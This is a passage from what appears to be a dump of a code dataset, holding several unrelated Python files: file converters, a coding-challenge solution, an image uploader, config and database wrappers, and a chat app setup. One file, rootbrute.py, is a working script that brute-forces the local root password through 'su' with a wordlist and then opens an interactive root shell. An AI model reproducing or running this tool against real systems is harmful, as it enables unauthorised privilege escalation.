\\n\\n\"\n\n body = \"\"\n if self.segments:\n for segment in self.segments:\n body += f\"\\n\"\n body += f\"{segment.source}\\n\"\n body += f\"{segment.target}\\n\"\n body += \"\\n\\n\"\n \n footer = \"
\\n\"\n footer += \"\\n\"\n footer += \"\\n\"\n\n return header, body, footer\n\nclass Segment:\n def __init__(self, id, source, target):\n self.id = id\n self.source = self.cleanStringForXML(source)\n self.target = self.cleanStringForXML(target)\n \n def cleanStringForXML(self, text, reverse=False):\n find_and_replace = {\n \"&\": \"&\",\n \"\\\"\": \""\",\n \"'\": \"'\",\n \"<\": \"<\",\n \">\": \">\"\n }\n \n text = str(text)\n for k, v in find_and_replace.items():\n if reverse:\n text = text.replace(v, k)\n else:\n text = text.replace(k, v)\n\n return text.strip()\n \nif __name__ == \"__main__\":\n import os\n import time\n \n ext_num = input(\"Select output format - [1]: TMX, [2]: XLIFF\\nEnter number: \")\n ext_map = {\n \"1\": \"tmx\",\n \"2\": \"xliff\"\n }\n try:\n for i in os.listdir():\n if \".xlsx\" in i:\n start_time = time.time()\n print(f\"Processing file {i}\")\n offline_case = OfflineCase(i)\n offline_case.convert(ext_map[ext_num])\n elapsed_time = round(time.time() - start_time, 2)\n print(f\"Success! Completed in {elapsed_time} seconds.\")\n input(\"Task completed. Press to close this window.\")\n except Exception as e:\n input(f\"An error occurred. {repr(e)}. Press to close this window.\")\n"},"size":{"kind":"number","value":4505,"string":"4,505"}}},{"rowIdx":829,"cells":{"max_stars_repo_path":{"kind":"string","value":"challenges/codility/lessons/q029/min_perimeter_rectangle_v001.py"},"max_stars_repo_name":{"kind":"string","value":"Joeffison/coding_challenges"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023191"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\nfrom math import sqrt\n\n\ndef solution(n):\n \"\"\"\n Returns the minimal perimeter for a rectangle of area n.\n \"\"\"\n\n # given the sides a and b, the area of a rectangle is n = a*b and the perimeter is 2 * (a + b)\n # for a minimal perimeter, we have to minimize the difference between a and b\n for i in range(int(sqrt(n)), 0, -1):\n\n # a and b must be the closest possible to sqrt(n)\n if n % i == 0:\n return 2*(i + n//i)\n"},"size":{"kind":"number","value":453,"string":"453"}}},{"rowIdx":830,"cells":{"max_stars_repo_path":{"kind":"string","value":"rootbrute.py"},"max_stars_repo_name":{"kind":"string","value":"lucthienphong1120/full-45-bruteforce-tools"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023280"},"content":{"kind":"string","value":"#!/usr/bin/python \n#Local Root BruteForcer \n\n#More Info: http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571\n \n#http://www.darkc0de.com \n#d3hydr8[at]gmail[dot]com \n \nimport sys \ntry: \n\timport pexpect \nexcept(ImportError): \n\tprint \"\\nYou need the pexpect module.\" \n\tprint \"http://www.noah.org/wiki/Pexpect\\n\" \n\tsys.exit(1) \n \n#Change this if needed. \nLOGIN_ERROR = 'su: incorrect password' \n \ndef brute(word): \n\tprint \"Trying:\",word \n\tchild = pexpect.spawn ('su') \n\tchild.expect ('Password: ') \n\tchild.sendline (word) \n\ti = child.expect (['.+\\s#\\s',LOGIN_ERROR]) \n\tif i == 0: \n\t\tprint \"\\n\\t[!] Root Password:\",word \n\t\tchild.sendline ('whoami') \n\t\tprint child.before \n\t\tchild.interact() \n\t#if i == 1: \n\t\t#print \"Incorrect Password\" \n \nif len(sys.argv) != 2: \n\tprint \"\\nUsage : ./rootbrute.py \" \n\tprint \"Eg: ./rootbrute.py words.txt\\n\" \n\tsys.exit(1) \n \ntry: \n\twords = open(sys.argv[1], \"r\").readlines() \nexcept(IOError): \n \tprint \"\\nError: Check your wordlist path\\n\" \n \tsys.exit(1) \n \nprint \"\\n[+] Loaded:\",len(words),\"words\" \nprint \"[+] BruteForcing...\\n\" \nfor word in words: \n\tbrute(word.replace(\"\\n\",\"\"))"},"size":{"kind":"number","value":1136,"string":"1,136"}}},{"rowIdx":831,"cells":{"max_stars_repo_path":{"kind":"string","value":"figures/figure_5.py"},"max_stars_repo_name":{"kind":"string","value":"mhsung/fuzzy-set-dual"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2023412"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# ()\n# March 2018\n\nimport os, sys\nBASE_DIR = os.path.normpath(\n os.path.join(os.path.dirname(os.path.abspath(__file__))))\n\nfrom collect_results import *\n\n\nif __name__ == '__main__':\n synset_partial_idx_pairs = [\n ('Airplane', 579),\n ('Car', 57),\n ('Chair', 7251),\n ('Guitar', 5),\n ('Lamp', 117),\n ('Rifle', 371),\n ('Sofa', 1184),\n ('Table', 1414),\n ('Watercraft', 294)]\n\n top_k = 5\n\n out_name = os.path.splitext(os.path.basename(__file__))[0]\n out_dir = os.path.join(BASE_DIR, out_name)\n\n collect_complementarity_results(synset_partial_idx_pairs, top_k, out_dir)\n\n"},"size":{"kind":"number","value":721,"string":"721"}}},{"rowIdx":832,"cells":{"max_stars_repo_path":{"kind":"string","value":"Plugins/Configs/Pages/Updates.py"},"max_stars_repo_name":{"kind":"string","value":"CHHOrganization/BlackDoc"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"id":{"kind":"string","value":"2022970"},"content":{"kind":"string","value":"import os, time, sys\nfrom Plugins.Configs.Settings import *\n\ndef Updates_Page():\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n clearConsole()\n Index_Banner()\n for char in Banner_msg:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.0)\n print(Dark_Blue + BG_Dark_Green + \"\")\n for char in Line:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.500)\n print(Rest + Bright_Green + BG_Dark_Blue)\n for char in Endl:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.0)\n print(Rest +\"\")\n\n print(Bright_Yellow) \n Auto_Text_15 = \"Updates\"\n for char in Auto_Text_15: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n #The Org Message\n print(Bright_Yellow)\n Auto_Text_11 = \"The Organization Updates\"\n for char in Auto_Text_11: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_12 = \"Date: 20/02/2022 Updates\"\n for char in Auto_Text_12: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Bright_Green +\"The Org is finally in it's own level of\\n\\\ntrust with it's members to share and make use of this script. This Script\")\n print(\"Containing The Org data as our members\\n\\\nagreed to share their public cryptic info throw the BlackDoc\")\n print(Bright_Red +\"Please Note; All information in this\\n\\\ndocument is classified to unmembers of\\n\\\nThe Org\")\n print(\"Make sure you dont share this script!\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n \n #New Members Updates\n print(Bright_Yellow)\n Auto_Text_13 = \"New Members List\"\n for char in Auto_Text_13: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_14 = \"Date: 21/03/2022 Updates \"\n for char in Auto_Text_14: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Dark_Magenta + Ms1 + Bright_Red +\". Theres No New Members...\") \n print(Bright_Green +\"Use Menu -> Then Cammand; 'Memberships'\\n\\\nTo See The Full Memberships Borad.\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n #About The BlackDoc\n print(Bright_Yellow)\n Auto_Text_17 = \"About BlackDoc Updates\"\n for char in Auto_Text_17: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n print(Bright_Cyan)\n Auto_Text_16 = \"Date: 22/02 - 01/03/2022 Updates\"\n for char in Auto_Text_16: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print()\n\n print(Bright_Green +\"About The Script.\")\n print(\"You using;\")\n print(\"Name: BlackDocument.py\")\n print(\"Version: V0.0.03\")\n print(\"Security Level: \"+ Ms1 + \".03\")\n print(\"Developed By: CHHOrg\")\n print(\"Promoted By: DarkDoor\")\n print(\"Released Date: 20/02/2022\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n \n print(Bright_Yellow)\n Auto_Text_18 = \"Errors, Fixed Errors and New Features\\n\\\nUpdates\"\n for char in Auto_Text_18: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_10 = \"Date: 21/02/2022 Updates\\n\\\n[(Old Version)]\"\n for char in Auto_Text_10: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Bright_Red)\n Auto_Text_9 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_9: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed all spelling errors\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Fixed all cutting words\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed underlinings Lan\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). Fixed underlining divisions\")\n print(\"for each page in our Menu\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). Fixed directory folder in Zip\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red)\n Auto_Text_8 = \"[+] -> New Features\"\n for char in Auto_Text_8: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added Colors\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We added Banner\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). We added more error messages\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Cyan + \"\")\n Auto_Text_7 = \"Date: 22/02 - 01/03/2022 Updates\\n\\\n([Previous Version])\"\n for char in Auto_Text_7: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n \n print(Bright_Red + \"\")\n Auto_Text_6 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_6: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed Menu Borders\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red + \"\")\n Auto_Text_5 = \"[+] -> New Features\"\n for char in Auto_Text_5: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added new menu items\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We added script animation\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). We added new security for exits\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). We added a Bot\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). We added Commands\")\n print(Bright_Magenta + Ms6 + Bright_Green +\"). We added Org Rules at More. in Menu\")\n print(Bright_Magenta + Ms7 + Bright_Green +\"). We added Loading Progress\")\n \n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red +\"\")\n Auto_Text_4 = \"[+] -> Errors\"\n for char in Auto_Text_4: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Chat Option in Menu for Termux/Linux\\n\\\nIs not working!!!\\n\\\n\\n\\\nNote: In Termux we run TermuxRun.sh after\\n\\\nInstallations.\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Other Items in Menu they are\\n\\\nUnavailable\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). The script is still under Developing\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Cyan + \"\")\n Auto_Text_7 = \"Date: 01/03 - 21/03/2022 Updates\\n\\\n([New Version])\"\n for char in Auto_Text_7: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n \n print(Bright_Red + \"\")\n Auto_Text_6 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_6: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed Login Security\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Fixed More Menu Logout System\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed Directory Of Game; EvilNinja\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed Updates Page (Updates Numbering)\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red + \"\")\n Auto_Text_5 = \"[+] -> New Features\"\n for char in Auto_Text_5: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added loop\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We we changed colors\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). We advanced login security\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). We added a game called EvilNinja\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). We modified the program\")\n print(Bright_Magenta + Ms6 + Bright_Green +\"). We made more menu items available\")\n print(Bright_Magenta + Ms7 + Bright_Green +\"). Hacking Lessons Will Be Available\\n\\\nDate; 01/04/2022\")\n \n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red +\"\")\n Auto_Text_4 = \"[+] -> Errors\"\n for char in Auto_Text_4: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Chat Option in Menu for Termux/Linux\\n\\\nIs not working!!!\\n\\\n\\n\\\nNote: BlackDoc Might Be In Github\\n\\\nBut Is Still Under developing.\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Other Items in Menu they are\\n\\\nUnavailable\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). The script is still under Developing\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n"},"size":{"kind":"number","value":9158,"string":"9,158"}}},{"rowIdx":833,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/moz_image/main.py"},"max_stars_repo_name":{"kind":"string","value":"mozkzki/moz-image"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024489"},"content":{"kind":"string","value":"import os\nimport sys\nimport uuid\nimport requests\nfrom contextlib import contextmanager\nfrom dotenv import load_dotenv\nfrom PIL import Image as pimage\n\nGYAZO_UPLOAD_URL = \"https://upload.gyazo.com/api/upload\"\n\n\n@contextmanager\ndef download(url: str):\n image = _download_image(url)\n save_file_path = _save_image(image)\n try:\n yield save_file_path\n finally:\n os.remove(save_file_path)\n\n\ndef _download_image(url: str, timeout: int = 10) -> bytes:\n response = requests.get(url, allow_redirects=False, timeout=timeout)\n if response.status_code != 200:\n e = Exception(\"HTTP status: \" + str(response.status_code))\n raise e\n\n content_type = response.headers[\"content-type\"]\n if \"image\" not in content_type:\n e = Exception(\"Content-Type: \" + str(content_type))\n raise e\n\n return response.content\n\n\ndef _make_save_file_path() -> str:\n file_name = str(uuid.uuid4())\n save_file_path = os.path.join(\"/tmp/mmimage/\", file_name)\n return save_file_path\n\n\ndef _save_image(image: bytes) -> str:\n save_file_path = _make_save_file_path()\n\n # ディレクトリが存在しない場合は作る\n os.makedirs(os.path.dirname(save_file_path), exist_ok=True)\n\n with open(save_file_path, \"wb\") as fout:\n fout.write(image)\n\n return save_file_path\n\n\ndef resize(path: str, *, width: int = 302) -> None:\n if os.path.isfile(path) is not True:\n print(\"file does not exists. path={}\".format(path), file=sys.stderr)\n return\n\n img = pimage.open(path)\n\n # 保存先のファイル名作成\n # フォーマット指定がないとエラーになる\n new_path = \"\".join((path, \".\", img.format))\n\n # 画像の解像度を取得して、リサイズする高さを計算\n img_width, img_height = img.size\n resize_width = float(width)\n resize_height = resize_width / img_width * img_height\n\n # 画像をリサイズ\n img = img.resize((int(resize_width), int(resize_height)))\n img.save(new_path)\n\n # 古いファイルと入れ替える\n os.remove(path)\n os.rename(new_path, path)\n\n\ndef upload_to_gyazo(path: str, access_token: str = None) -> str:\n image = open(path, \"rb\")\n files = {\"imagedata\": image}\n # files = {\"imagedata\": (\"filename\", image, \"image\")}\n\n # 引数指定がなければ環境変数からaccess token読み込み\n if access_token is None:\n load_dotenv(verbose=True)\n access_token = os.environ.get(\"gyazo_access_token\", \"dummy_token\")\n\n data = {\"access_token\": access_token}\n response = requests.post(GYAZO_UPLOAD_URL, files=files, data=data)\n if response.reason == \"Unauthorized\" and response.status_code == 401:\n print(\n \"[error] gyazo access token is invalid!\",\n \"please set correct token by environment variable .\",\n )\n return \"\"\n\n url = response.json()[\"url\"]\n print(\"------------- URL: \", url)\n return url\n"},"size":{"kind":"number","value":2744,"string":"2,744"}}},{"rowIdx":834,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/other/sbl.py"},"max_stars_repo_name":{"kind":"string","value":"sgherbst/simple-base-lib"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024217"},"content":{"kind":"string","value":"import sblc\nimport os\n\n\n# set working dir to SBL's dataPath\n# fix(later): should do this directly from C++ code\nos.chdir( sblc.dataPath() )\n\n\n# convert a python value to a string value suitable to for SBL commands/configs\ndef strProc( val ):\n valStr = str( val );\n if valStr == \"False\":\n valStr = \"0\"\n if valStr == \"True\":\n valStr = \"1\"\n return valStr\n\n\n# represents an entry in a configuration file\nclass ConfigEntry:\n \n # basic constructor\n def __init__( self, _name, _value, _comment ):\n self.name = _name\n self.value = _value\n self.comment = _comment\n\n\n# represents a configuration file\nclass Config:\n\n # basic constructor\n def __init__( self ):\n self.__dict__[ \"_entries\" ] = []\n\n # add a config entry\n def __setattr__( self, name, value ):\n if not name.startswith( \"_\" ):\n found = False\n for e in self._entries: # fix(later): use dict (though want to maintain order)\n if e.name == name:\n e.value = value \n found = True\n if not found:\n self._entries.append( ConfigEntry( name, value, \"\" ) ) \n\n # read a config entry\n def __getattr__( self, name ):\n if not name.startswith( \"_\" ):\n for e in self._entries: # fix(later): use dict (though want to maintain order)\n if e.name == name:\n return e.value\n raise AttributeError\n\n # create a string version suitable for passing to an SBL command\n def __str__( self ):\n s = \"\"\n for e in self._entries:\n if e.name:\n s += e.name + \"=\" + strProc( e.value ) + \" \"\n return s\n\n # load a configuration file (in SBL format)\n def load( self, fileName ):\n f = open( fileName, \"r\" )\n if f:\n for line in f:\n line = line.strip()\n\n # get comments/meta-data\n preComment = line\n comment = \"\"\n if '[' in line:\n split = line.split( '[', 1 )\n preComment = split[ 0 ]\n comment = \"[\" + split[ 1 ]\n elif '#' in line:\n split = line.split( '#', 1 )\n preComment = split[ 0 ]\n comment = \"#\" + split[ 1 ]\n\n # get name and value (if any)\n name = \"\"\n value = \"\"\n split = preComment.split()\n if len( split ) >= 2:\n name = split[ 0 ]\n value = split[ 1 ]\n\n # append an entry (even for blank lines)\n self._entries.append( ConfigEntry( name, value, comment ) )\n\n # save this configuration file (in SBL format)\n def save( self, fileName ):\n f = open( fileName, \"w\" )\n if f:\n for e in self._entries:\n if e.name:\n f.write( e.name )\n f.write( \" \" )\n f.write( strProc( e.value ) )\n if e.comment:\n f.write( \" \" )\n if e.comment:\n f.write( e.comment )\n f.write( \"\\n\" )\n \n\n# provides a simple interface to SBL commands\nclass CommandRouter:\n\n # return true if user has requested that the current command stop running\n def checkCommandCancel( self ):\n return sblc.checkCommandEvents()\n\n # display a message\n def disp( self, indent, message ):\n sblc.disp( 0, indent, message )\n\n # display a warning\n def warning( self, message ):\n sblc.disp( 1, 0, message )\n\n # display a fatal error (will terminate program)\n def fatalError( self, message ):\n sblc.disp( 2, 0, message )\n\n # assume all other method calls are commands; send to SBL C++ command system\n def __getattr__( self, name ):\n if not name.startswith( \"_\" ):\n def runCommand( *args, **keywords ):\n cmdStr = name + \" \" + \" \".join( [strProc( a ) for a in args] )\n sblc.execCommand( cmdStr )\n return runCommand\n else:\n raise AttributeError\n"},"size":{"kind":"number","value":4214,"string":"4,214"}}},{"rowIdx":835,"cells":{"max_stars_repo_path":{"kind":"string","value":"aiobot/exceptions/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"thedyrn/aio-vkbot"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2023480"},"content":{"kind":"string","value":"\nfrom .vk_error import VkError\nfrom .aiobot_error import NoneSessionError\n__all__ = [VkError, NoneSessionError]"},"size":{"kind":"number","value":111,"string":"111"}}},{"rowIdx":836,"cells":{"max_stars_repo_path":{"kind":"string","value":"binary-search/python/binary_search.py"},"max_stars_repo_name":{"kind":"string","value":"abccdabfgc/algorithms-java"},"max_stars_count":{"kind":"number","value":16,"string":"16"},"id":{"kind":"string","value":"2023290"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\nimport os, json\n\ndef binary_search(key, arr):\n lo = 0\n hi = len(arr) - 1\n while lo <= hi:\n mid = lo + (hi - lo) // 2;\n if key < arr[mid]:\n hi = mid - 1\n elif key > arr[mid]:\n lo = mid + 1\n else:\n return mid\n return -1\n\ndef main():\n with open(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'input.json')) as f:\n for input in json.load(f):\n r = binary_search(input['key'], input['array'])\n print('binary_search(%s, %s) => %s' % (input['key'], input['array'], r))\n if input['result'] != r:\n raise Error('failed. expected = %s, actual = %s' % (input['result'], r))\n\nif __name__ == '__main__':\n main()\n"},"size":{"kind":"number","value":782,"string":"782"}}},{"rowIdx":837,"cells":{"max_stars_repo_path":{"kind":"string","value":"test/test_chained_func_call.py"},"max_stars_repo_name":{"kind":"string","value":"mad-center/bilibili-mad-crawler"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023173"},"content":{"kind":"string","value":"def foo(next=True):\n print('foo')\n return next\n\n\ndef bar():\n print('bar')\n return False\n\n\nfoo(next=True) and bar()\nprint('=' * 50)\nfoo(next=False) and bar()\n"},"size":{"kind":"number","value":169,"string":"169"}}},{"rowIdx":838,"cells":{"max_stars_repo_path":{"kind":"string","value":"number_terms.py"},"max_stars_repo_name":{"kind":"string","value":"mvgugaev/Python-Algorit-Stepik"},"max_stars_count":{"kind":"number","value":11,"string":"11"},"id":{"kind":"string","value":"2024530"},"content":{"kind":"string","value":"import time\n\n# Задача: По данному числу 1 <= n <=10^9 найдите максимальное число k,\n# для которого nn можно представить как сумму k различных натуральных слагаемых.\n# Выведите в первой строке число k, во второй — k слагаемых.\n\n# Input:\n# 6\n# 120 30\n# Output:\n# 3\n# 1 2 3\n# Time: 4.935264587402344e-05 s\n\n\ndef main():\n n = int(input())\n\n # Get start time\n start = time.time()\n\n result, part = [], 1\n\n while n != 0:\n while part * 2 >= n and part != n:\n part += 1\n\n result.append(part)\n n -= part\n\n part += 1\n\n print(str(len(result)) + '\\n' + ' '.join([str(i) for i in result]))\n\n # Show time\n print('Time: ', time.time() - start, 's')\n\n\nif __name__ == \"__main__\":\n main()\n"},"size":{"kind":"number","value":737,"string":"737"}}},{"rowIdx":839,"cells":{"max_stars_repo_path":{"kind":"string","value":"init_db.py"},"max_stars_repo_name":{"kind":"string","value":"MardanovTimur/aiochat"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024326"},"content":{"kind":"string","value":"from sqlalchemy import create_engine, MetaData\n\nfrom chatapp.settings import config\nfrom chatapp.models import user, friends\nfrom aiopg.sa.engine import aiopg\n\nDSN = 'postgresql://{user}:{password}@{host}:{port}/{database}'\n\n\ndef create_tables(engine):\n \"\"\" Initialize the database\n \"\"\"\n meta = MetaData()\n meta.create_all(bind=engine, tables=[user, friends])\n\n\ndef sample_data(engine):\n \"\"\" Creates the sample data in database\n \"\"\"\n conn = engine.connect()\n conn.execute(user.insert(), [\n {\n 'username': 'timurmardanov97',\n },\n {\n 'username': 'jax02',\n },\n ])\n conn.close()\n\n\nasync def init_pg(app):\n conf = app['config']['postgres']\n engine = await aiopg.sa.create_engine(**conf)\n app['db'] = engine\n\n\nasync def close_pg(app):\n app['db'].close()\n await app['db'].wait_closed()\n\n\nif __name__ == '__main__':\n db_url = DSN.format(**config['postgres'])\n engine = create_engine(db_url)\n\n create_tables(engine)\n sample_data(engine)\n"},"size":{"kind":"number","value":1035,"string":"1,035"}}},{"rowIdx":840,"cells":{"max_stars_repo_path":{"kind":"string","value":"terminio/commandexecutor/cd.py"},"max_stars_repo_name":{"kind":"string","value":"SourishS/terminio"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023741"},"content":{"kind":"string","value":"from terminio.commandexecutor.commandexecutor import CommandExecutor\n\nclass cd(CommandExecutor):\n def __init__(self, session):\n super(cd, self).__init__(session)\n self.grammer = {\n 'directory' : { \n 'description' : 'Directory to list',\n 'type' : 'string'\n }\n }\n\n\n def execute_command(self, cwd, args):\n if args.directory is None:\n \treturn cwd\n elif args.directory == '.':\n return cwd\n elif args.directory == '..':\n return '/'.join(cwd.split('/')[0:-1])\n else:\n \treturn args.directory"},"size":{"kind":"number","value":634,"string":"634"}}},{"rowIdx":841,"cells":{"max_stars_repo_path":{"kind":"string","value":"binding.gyp"},"max_stars_repo_name":{"kind":"string","value":"tylerflint/node-kstat"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024035"},"content":{"kind":"string","value":"{\n 'targets': [\n {\n 'target_name': 'kstat',\n 'sources': [ 'kstat.cc' ],\n 'libraries': [ '-lkstat' ],\n 'cflags_cc': [ '-Wno-write-strings' ],\n 'cflags_cc!': [ '-fno-exceptions' ],\n }\n ]\n}\n"},"size":{"kind":"number","value":220,"string":"220"}}},{"rowIdx":842,"cells":{"max_stars_repo_path":{"kind":"string","value":"convertmusic/db/meta.py"},"max_stars_repo_name":{"kind":"string","value":"groboclown/music-uploader"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024191"},"content":{"kind":"string","value":"\nimport sqlite3\nimport os\n\n\nclass Table(object):\n def __init__(self, conn, table_name, columns):\n \"\"\"\n columns: list of columns, which is itself a list of:\n column name, column SQL type, default value, is index.\n First column is always the primary key (never inserted)\n \"\"\"\n object.__init__(self)\n self.__name = table_name\n self.__conn = conn\n self.__identity_column_name = columns[0][0]\n self.__insert_column_names = []\n # skip the unique column id\n for c in columns[1:]:\n self.__insert_column_names.append(c[0])\n upgrade = False\n c = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name=?;\", [table_name])\n for row in c:\n if row[0] == table_name:\n upgrade = True\n c.close()\n if upgrade:\n # TODO allow upgrade\n pass\n else:\n col_sql = []\n for c in columns:\n s = '{0} {1}'.format(c[0], c[1])\n if len(c) > 2 and c[2] is not None:\n s += ' DEFAULT {0}'.format(c[2])\n if len(c) > 3 and c[3] is not None:\n s += ' {0}'.format(c[3])\n col_sql.append(s)\n sql = 'CREATE TABLE {0} ({1})'.format(table_name, ','.join(col_sql))\n conn.execute(sql)\n conn.commit()\n\n def insert(self, *values):\n vs = []\n for n in values:\n vs.append('?')\n c = self.__conn.execute(\"INSERT INTO {0} ({1}) VALUES ({2})\".format(\n self.__name, ','.join(self.__insert_column_names), ','.join(vs)\n ), values)\n r = c.lastrowid\n c.close()\n self.__conn.commit()\n return r\n\n def delete_by_id(self, id):\n try:\n c = self.__conn.execute(\"DELETE FROM {0} WHERE {1} = ?\".format(\n self.__name, self.__identity_column_name\n ), [id])\n ret = c.rowcount\n c.close()\n self.__conn.commit()\n return ret > 0\n except:\n print(\"PROBLEM with sql: {0}\".format(\n \"DELETE FROM {0} WHERE {1} = ?\".format(\n self.__name, self.__identity_column_name)\n ))\n raise\n\n def delete_where(self, where_clause, *values):\n c = self.__conn.execute('DELETE FROM {0} WHERE {1}'.format(\n self.__name, where_clause), values)\n ret = c.rowcount\n c.close()\n self.__conn.commit()\n return ret\n\n def close(self):\n self.__conn = None\n\n def __del__(self):\n self.close()\n\n\nclass TableDef(object):\n def __init__(self, name, columns=None):\n object.__init__(self)\n self.__name = name\n self.__columns = []\n if columns is not None:\n self.__columns.extend(columns)\n\n def with_column(self, name, type, default=None, index=None):\n self.__columns.append([name, type, default, index])\n return self\n\n @property\n def name(self):\n return self.__name\n\n @property\n def columns(self):\n return self.__columns\n\n\nclass Db(object):\n def __init__(self, filename, table_defs):\n \"\"\"\n table_defs: list of TableDef instances.\n \"\"\"\n object.__init__(self)\n self.__conn = sqlite3.connect(filename)\n self.__tables = {}\n for td in table_defs:\n assert isinstance(td, TableDef)\n t = Table(self.__conn, td.name, td.columns)\n self.__tables[td.name] = t\n\n def __del__(self):\n self.close()\n\n def close(self):\n if self.__conn is not None:\n self.__conn.close()\n self.__conn = None\n\n def query(self, query, *values):\n \"\"\"\n Returns iterable rows.\n \"\"\"\n # print(\"DEUBG query: {0} {1}\".format(repr(query), repr(values)))\n v2 = []\n for v in values:\n if isinstance(v, str) and '\\\\' in v:\n v = v.replace('\\\\', '\\\\\\\\')\n v2.append(v)\n c = 